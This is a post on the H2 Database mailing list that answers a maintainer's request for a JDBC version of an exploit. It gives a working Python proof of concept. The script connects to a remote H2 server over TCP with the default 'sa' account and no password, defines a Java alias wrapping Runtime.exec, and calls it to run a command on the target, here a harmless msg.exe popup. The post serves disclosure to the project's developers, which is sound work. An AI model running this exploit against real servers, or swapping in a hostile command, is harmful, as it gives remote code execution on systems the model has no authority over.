Here's a small Python POC:
- Windows-based (feel free to tweak for *nix)
- Requires jaydebeapi (run "pip install jaydebeapi")
- Assumes javac is in the system path (so does the original POC)
import jaydebeapi
SERVER = "SERVER_TO_EXPLOIT"
conn = jaydebeapi.connect("org.h2.Driver",
"jdbc:h2:tcp://%s:9092/C:\\Windows\\Temp\\exploit" % (SERVER),["sa", ""],
"./h2-1.4.196.jar",)
curs = conn.cursor()
curs.execute('DROP ALIAS IF EXISTS EXECVE')
curs.execute('CREATE ALIAS EXECVE AS $$ void execve(String cmd) throws
java.io.IOException { Runtime.getRuntime().exec(cmd); }$$;')
curs.execute("CALL EXECVE('c:\\windows\\system32\\msg.exe *
\"Exploited!\"')")
On Thursday, November 1, 2018 at 1:02:31 PM UTC-4, Noel Grandin wrote:
>
> where is the JDBC version of the exploit?
>
--
You received this message because you are subscribed to the Google Groups "H2
Database" group.
To unsubscribe from this group and stop receiving emails from it, send an email
to h2-database+unsubscr...@googlegroups.com.
To post to this group, send email to h2-database@googlegroups.com.
Visit this group at https://groups.google.com/group/h2-database.
For more options, visit https://groups.google.com/d/optout.
